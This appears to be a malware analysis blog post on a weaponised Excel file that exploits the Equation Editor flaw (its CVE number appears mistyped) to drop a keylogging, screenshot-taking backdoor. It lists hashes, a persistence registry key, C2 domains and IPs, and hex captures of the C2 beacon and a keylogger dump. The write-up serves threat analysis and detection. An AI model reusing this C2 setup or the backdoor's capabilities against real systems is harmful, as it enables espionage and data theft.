Excel document equipped with CVE 2017-1188

SPY / BACKDOOR, INDO-PAK CONFLICT

This vulnerability is associated with the equation data structure. Purpose of this component is to insert/modify equations in a document i.e. MSWORD, EXCEL, etc. The main issue is the handling of objects in the memory. By corrupting those objects the adversary could execute arbitrary malicious code in the address space of the vulnerable application. The vulnerable application eqnedt32.exe is a very old, out-dated application that is compiled and linked without using any security switches. It seems like the vulnerability is within MSOFFICE, however, it's being launched from the DCOM Server. This means it's outside the scope of MSOFFICE (NOT AN MSOFFICE VULNERABILITY). Eqnedt32 is an out of bound COM server.


 In short, CVE 2017-1188 is a stackoverflow in the data structure, where it reaches WinExec() function.

The vulnerability is used as a dropper ONLY. EQNEDT32.EXE calls the following functions:


    RtlInitUnicodeStringEx ( 0x0018e9b0, "C:\Users\foo\AppData\Roaming\MSBuild.exe" );

    Where 0x0018e9b0 is the address/pointer to the buffer that will store the actual source string.


NtCreateFile is used to write the executable.


    NtCreateFile ( 0x0018e9d0, FILE_READ_ATTRIBUTES | GENERIC_WRITE | SYNCHRONIZE, ObjectAttributes, IoStatusBlock, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ, FILE_CREATE, FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0 ) 


Here is some more info on the dropped file:

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

LINES: 461

WORDS: 3696

CHARS: 192271

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

MD5   : 0f4f6913c3aa57b1fc5c807e0bc060fc

SHA256: 4ec1856bd5819a7edc96ec40c51acaa9d3045e2d0ea5f83459a4901371caf074

SHA1  : 00e02cba2d4f2aaabce64ed0c9c153c63bb9233e

COMPILE-TIME

Persistence:

The CVE adds the following registry value


                                     lollipop   ->     C:\Users\foo\AppData\Roaming\MSBuild.exe


The second stage backdoor doesn’t start right away. It executes once the user logs off and logs in again.

MSBuild.exe uses socket calls to connect to the C2 server by using InternetOpenUrlW()


The backdoor checks for the internet access by connecting to wikipedia website.

=========================== (UDURRANI) =================================


(LAYER: 4)

s_port: 53 |d_port: 64548 |len=64548 

    4F 78 81 80 00 01 00 02 00 00 00 00 02 65 6E 09         Ox.?.........en.

    77 69 6B 69 70 65 64 69 61 03 6F 72 67 00 00 01         wikipedia.org...

    00 01 C0 0C 00 05 00 01 00 00 00 05 00 11 04 64         ...............d

    79 6E 61 09 77 69 6B 69 6D 65 64 69 61 C0 19 C0         yna.wikimedia...

    2E 00 01 00 01 00 00 00 05 00 04 5B C6 AE C0            ...........[...



=========================== (UDURRANI) =================================

(INIT) SYN PACKET SENT FROM 172.16.223.129    TO IP ADDRESS 91.198.174.192

    PORT INFORMATION (49544, 443)

    SEQUENCE INFORMATION (2254584484, 0)

    |URG:0 | ACK:0 | PSH:0 | RST:0 | SYN:1 | FIN:0|

    (66)




=========================== (UDURRANI) =================================

(SYN ACK ) PACKET SENT FROM 91.198.174.192    TO IP ADDRESS 172.16.223.129

    PORT INFORMATION (443, 49544)

    SEQUENCE INFORMATION (1061382590, 2254584485)


    |URG:0 | ACK:1 | PSH:0 | RST:0 | SYN:1 | FIN:0|

    (60)

    00 00                                                   ..



=========================== (UDURRANI) =================================

(ACKN) ACK PACKET SENT FROM 172.16.223.129    TO IP ADDRESS 91.198.174.192

    PORT INFORMATION (49544, 443)

    SEQUENCE INFORMATION (2254584485, 1061382591)

    |URG:0 | ACK:1 | PSH:0 | RST:0 | SYN:0 | FIN:0|

    (60)

    00 00 00 00 00 00                                       ......




It connects to the following C2 servers to to get further instructions.




=========================== (UDURRANI) =================================


(LAYER: 4)

s_port: 53 |d_port: 61213 |len=61213 

    94 46 81 80 00 01 00 01 00 00 00 00 05 6E 6F 64         .F.?.........nod

    65 32 06 66 65 65 64 34 33 03 63 6F 6D 00 00 01         e2.feed43.com...

    00 01 C0 0C 00 01 00 01 00 00 00 05 00 04 2D 21         ..............-!

    42 55                                                   BU



=========================== (UDURRANI) =================================

(INIT) SYN PACKET SENT FROM 172.16.223.132    TO IP ADDRESS 45.33.66.85

    PORT INFORMATION (49388, 80)

    SEQUENCE INFORMATION (480995858, 0)

    |URG:0 | ACK:0 | PSH:0 | RST:0 | SYN:1 | FIN:0|

    (66)



=========================== (UDURRANI) =================================

(DATA PUSH!) IS COMING FROM 172.16.223.132    TO IP ADDRESS 45.33.66.85

    PORT INFORMATION (49388, 80)

    SEQUENCE INFORMATION (480995859, 2124736550)


    |URG:0 | ACK:1 | PSH:1 | RST:0 | SYN:0 | FIN:0|

    (376)

    50 4F 53 54 20 2F 30 30 35 36 32 33 34 31 37 38         POST /0056234178

    35 31 35 31 33 31 2E 78 6D 6C 20 48 54 54 50 2F         515131.xml HTTP/

    31 2E 31 0D 0A 41 63 63 65 70 74 3A 20 61 70 70         1.1..Accept: app

    6C 69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D 66         lication/x-www-f

    6F 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 0D 0A         orm-urlencoded..

    43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70         Content-Type: ap

    70 6C 69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D         plication/x-www-

    66 6F 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 0D         form-urlencoded.

    0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 55 73 65         .User-Agent: Use

    72 41 67 65 6E 74 3A 4D 6F 7A 69 6C 6C 61 2F 35         rAgent:Mozilla/5

    2E 30 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E         .0(Windows NT 6.

    31 3B 57 4F 57 36 34 29 41 70 70 6C 65 57 65 62         1;WOW64)AppleWeb

    4B 69 74 2F 35 33 37 2E 31 28 4B 48 54 4D 4C 2C         Kit/537.1(KHTML,

    6C 69 6B 65 20 47 65 63 6B 6F 29 43 68 72 6F 6D         like Gecko)Chrom

    65 2F 32 31 2E 30 2E 31 31 38 30 2E 37 35 53 61         e/21.0.1180.75Sa

    66 61 72 69 2F 35 33 37 2E 31 0D 0A 48 6F 73 74         fari/537.1..Host

    3A 20 6E 6F 64 65 32 2E 66 65 65 64 34 33 2E 63         : node2.feed43.c

    6F 6D 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67         om..Content-Leng

    74 68 3A 20 30 0D 0A 43 61 63 68 65 2D 43 6F 6E         th: 0..Cache-Con

    74 72 6F 6C 3A 20 6E 6F 2D 63 61 63 68 65 0D 0A         trol: no-cache..

    0D 0A                                                   ..




 73 63 72 69 70 74 69 6F 6E 3E 3C 21 5B 43 44 41         scription><![CDA

    54 41 5B 5B 5B 59 7A 6C 68 59 6D 4D 31 4E 6D 4A         TA[[[YzlhYmM1NmJ

    6A 5A 54 68 69 4D 47 56 68 59 54 52 6B 4E 47 52         jZThiMGVhYTRkNGR

    68 5A 44 68 6B 4E 47 56 6C 4E 57 4E 6D 59 7A 5A         hZDhkNGVlNWNmYzZ

    6A 4E 6D 4E 68 4F 47 4A 6A 4E 54 49 30 59 32 59         jNmNhOGJjNTI0Y2Y

    34 4E 44 67 30 4D 6A 4D 3D 5D 5D 5D 5D 3E 3C 2F         4NDg0MjM=]]]]></

    64 65 73 63 72 69 70 74 69 6F 6E 3E 0A 20 20 20         description>.   

    20 3C 6C 61 73 74 42 75 69 6C 64 44 61 74 65 3E          <lastBuildDate>

    54 75 65 2C 20 31 33 20 41 75 67 20 32 30 31 39         Tue, 13 Aug 2019

    20 30 35 3A 31 37 3A 34 39 20 47 4D 54 3C 2F 6C          05:17:49 GMT</l

    61 73 74 42 75 69 6C 64 44 61 74 65 3E 0A 20 20         astBuildDate>.  

    20 20 3C 67 65 6E 65 72 61 74 6F 72 3E 46 65 65           <generator>Fee

    64 34 33 20 50 72 6F 78 79 2F 31 2E 30 20 28 77         d43 Proxy/1.0 (w

    77 77 2E 66 65 65 64 34 33 2E 63 6F 6D 29 3C 2F         ww.feed43.com)</

    67 65 6E 65 72 61 74 6F 72 3E 0A 20 20 20 20 3C         generator>.    <

    74 74 6C 3E 33 36 30 3C 2F 74 74 6C 3E 0A 0A 3C         ttl>360</ttl>..<

    69 74 65 6D 3E 0A 3C 67 75 69 64 20 69 73 50 65         item>.<guid isPe

    72 6D 61 4C 69 6E 6B 3D 22 66 61 6C 73 65 22 3E         rmaLink="false">

    34 37 31 32 64 31 66 64 34 32 32 66 64 63 36 62         4712d1fd422fdc6b

    33 36 61 35 65 32 38 66 64 61 66 39 32 37 33 32         36a5e28fdaf92732

    3C 2F 67 75 69 64 3E 0A 3C 70 75 62 44 61 74 65         </guid>.<pubDate

    3E 54 75 65 2C 20 31 33 20 41 75 67 20 32 30 31         >Tue, 13 Aug 201

    39 20 30 35 3A 31 37 3A 34 39 20 47 4D 54 3C 2F         9 05:17:49 GMT</

    70 75 62 44 61 74 65 3E 0A 3C 74 69 74 6C 65 3E         pubDate>.<title>

    61 73 64 66 20 41 62 6F 75 74 20 61 73 64 66 20         asdf About asdf 

    57 68 61 74 20 69 73 20 61 73 64 66 20 3F 20 61         What is asdf ? a

    73 64 66 20 46 6F 72 75 6D 73 3C 2F 74 69 74 6C         sdf Forums</titl

    65 3E 0A 3C 64 65 73 63 72 69 70 74 69 6F 6E 3E         e>.<description>

    3C 21 5B 43 44 41 54 41 5B 3C 70 3E 3C 73 75 62         <![CDATA[<p><sub

    3E 3C 69 3E 2D 2D 20 44 65 6C 69 76 65 72 65 64         ><i>-- Delivered

    20 62 79 20 3C 61 20 68 72 65 66 3D 22 68 74 74          by <a href="htt

    70 3A 2F 2F 66 65 65 64 34 33 2E 63 6F 6D 2F 22         p://feed43.com/"

    3E 46 65 65 64 34 33 3C 2F 61 3E 20 73 65 72 76         >Feed43</a> serv

    69 63 65 3C 2F 69 3E 3C 2F 73 00 00 00 00 00 00         ice</i></s......




=========================== (UDURRANI) =================================


(LAYER: 4)

s_port: 53 |d_port: 55487 |len=55487 

    29 D6 81 80 00 01 00 01 00 00 00 00 03 32 33 31         )..?.........231

    02 33 38 02 32 38 03 31 33 39 07 69 6E 2D 61 64         .38.28.139.in-ad

    64 72 04 61 72 70 61 00 00 0C 00 01 C0 0C 00 0C         dr.arpa.........

    00 01 00 00 00 05 00 1D 03 31 33 39 02 32 38 02         .........139.28.

    33 38 03 32 33 31 0D 64 65 6C 74 61 68 6F 73 74         38.231.deltahost

    2D 70 74 72 00                                          -ptr.



=========================== (UDURRANI) =================================

(INIT) SYN PACKET SENT FROM 172.16.223.132    TO IP ADDRESS 139.28.38.231

    PORT INFORMATION (49392, 80)

    SEQUENCE INFORMATION (3546314215, 0)

    |URG:0 | ACK:0 | PSH:0 | RST:0 | SYN:1 | FIN:0|

    (66)





Let’s look at the flow

The backdoor starts looking for certain files. It uses FindFirstFileW(). Then it uses lstrcmpW() and look for the following extensions


  • XLSX
  • DOCX
  • PPTX
  • TXT
  • PDF



Data Theft


The backdoor uses GetTempPathA(260, &buffer_pointer_1), followed by

                   CreateFileA(&buffer_pointer_1, 0x40000000, 0x0, 0x0, 0x2, 0x80, 0x0)

Three files are dropped in %TEMP% location


  • 9PT568.dat
  • TPX498.dat
  • edg499.dat
  • TPX499.dat


TPX498 is used to capture keystrokes in real-time. Open windows and applications are also recorded


00000020: 3000 3000 3000 3400 3000 3900 0a00 0a00  0.0.0.4.0.9.....

00000030: 3200 3000 3100 3900 2f00 3000 3800 2f00  2.0.1.9./.0.8./.

00000040: 3100 3400 2000 3100 3100 3a00 3100 3500  1.4. .1.1.:.1.5.

00000050: 3a00 3400 3300 2000 2d00 2000 7b00 4300  :.4.3. .-. .{.C.

00000060: 3a00 5c00 5700 6900 6e00 6400 6f00 7700  :.\.W.i.n.d.o.w.

00000070: 7300 5c00 7300 7900 7300 7400 6500 6d00  s.\.s.y.s.t.e.m.

00000080: 3300 3200 5c00 6300 6d00 6400 2e00 6500  3.2.\.c.m.d...e.

00000090: 7800 6500 7d00 0a00 5b00 4500 4e00 5400  x.e.}...[.E.N.T.

000000a0: 4500 5200 5d00 0a00 0a00 3200 3000 3100  E.R.].....2.0.1.

000000b0: 3900 2f00 3000 3800 2f00 3100 3400 2000  9./.0.8./.1.4. .

000000c0: 3100 3100 3a00 3100 3500 3a00 3500 3700  1.1.:.1.5.:.5.7.

000000d0: 2000 2d00 2000 7b00 5300 7400 6100 7200   .-. .{.S.t.a.r.

000000e0: 7400 2000 6d00 6500 6e00 7500 7d00 0a00  t. .m.e.n.u.}...

000000f0: 6e00 6f00 7400 6500 7000 6100 6400 5b00  n.o.t.e.p.a.d.[.

00000100: 4500 4e00 5400 4500 5200 5d00 0a00 0a00  E.N.T.E.R.].....

00000110: 3200 3000 3100 3900 2f00 3000 3800 2f00  2.0.1.9./.0.8./.

00000120: 3100 3400 2000 3100 3100 3a00 3100 3500  1.4. .1.1.:.1.5.

00000130: 3a00 3500 3900 2000 2d00 2000 7b00 5500  :.5.9. .-. .{.U.

00000140: 6e00 7400 6900 7400 6c00 6500 6400 2000  n.t.i.t.l.e.d. .

00000150: 2d00 2000 4e00 6f00 7400 6500 7000 6100  -. .N.o.t.e.p.a.

00000160: 6400 7d00 0a00 5b00 5300 4800 4900 4600  d.}...[.S.H.I.F.

00000170: 5400 5d00 7000 6100 7300 7300 7700 6f00  T.].p.a.s.s.w.o.

00000180: 7200 6400 3100 3200 3300 3400 3500 3600  r.d.1.2.3.4.5.6.

00000190: 5b00 5300 4800 4900 4600 5400 5d00 3700 [.S.H.I.F.T.].7.

000001a0: 5b00 5300 4800 4900 4600 5400 5d00 3600  [.S.H.I.F.T.].6.

000001b0: 5b00 5300 4800 4900 4600 5400 5d00 3500  [.S.H.I.F.T.].5.

000001c0: 5b00 5300 4800 4900 4600 5400 5d00 3400  [.S.H.I.F.T.].4.

000001d0: 5b00 5300 4800 4900 4600 5400 5d00 3300  [.S.H.I.F.T.].3.

000001e0: 5b00 5300 4800 4900 4600 5400 5d00 3200  [.S.H.I.F.T.].2.

000001f0: 5b00 4500 4e00 5400 4500 5200 5d00 0a00  [.E.N.T.E.R.]...

00000200: 0a00 3200 3000 3100 3900 2f00 3000 3800  ..2.0.1.9./.0.8.

00000210: 2f00 3100 3400 2000 3100 3100 3a00 3100  /.1.4. .1.1.:.1.

00000220: 3600 3a00 3000 3700 2000 2d00 2000 7b00  6.:.0.7. .-. .{.

00000230: 4300 3a00 5c00 5700 6900 6e00 6400 6f00  C.:.\.W.i.n.d.o.

00000240: 7700 7300 5c00 7300 7900 7300 7400 6500  w.s.\.s.y.s.t.e.

00000250: 6d00 3300 3200 5c00 6300 6d00 6400 2e00  m.3.2.\.c.m.d...


9PT568 is used to get the computer hardware profile ID.

TPX499 is used to capture screen shots

edg499 is used to save path to .TXT, .PPT, .PDF, XLS, DOC, DOCX files.




Let’s examine how the keystrokes are captured in real-time.

The backdoor can receive instructions form the C2. E.g. if it receives the value 0x4, it will read edg499 and delete it.

If  it receives 0x21, it will use shell execute to spawn a specific file | command.

This would simply mean: Download (InternetOpenW -> InternetOpenUrlW -> InternetReadFile), open file handle, write, close handles and execute.

Conclusion:


This backdoor is used to steal important documents, keystrokes, screenshots, etc. It may be linked to an Indian APT group.  The backdoor is using popular or social media websites for C2 mechanism. Such websites are not flagged by most of the popular firewalls and IPS engines. Let’s get to the VT report for the 1st stage dropper.




STAY AWAY FROM BACKDOORS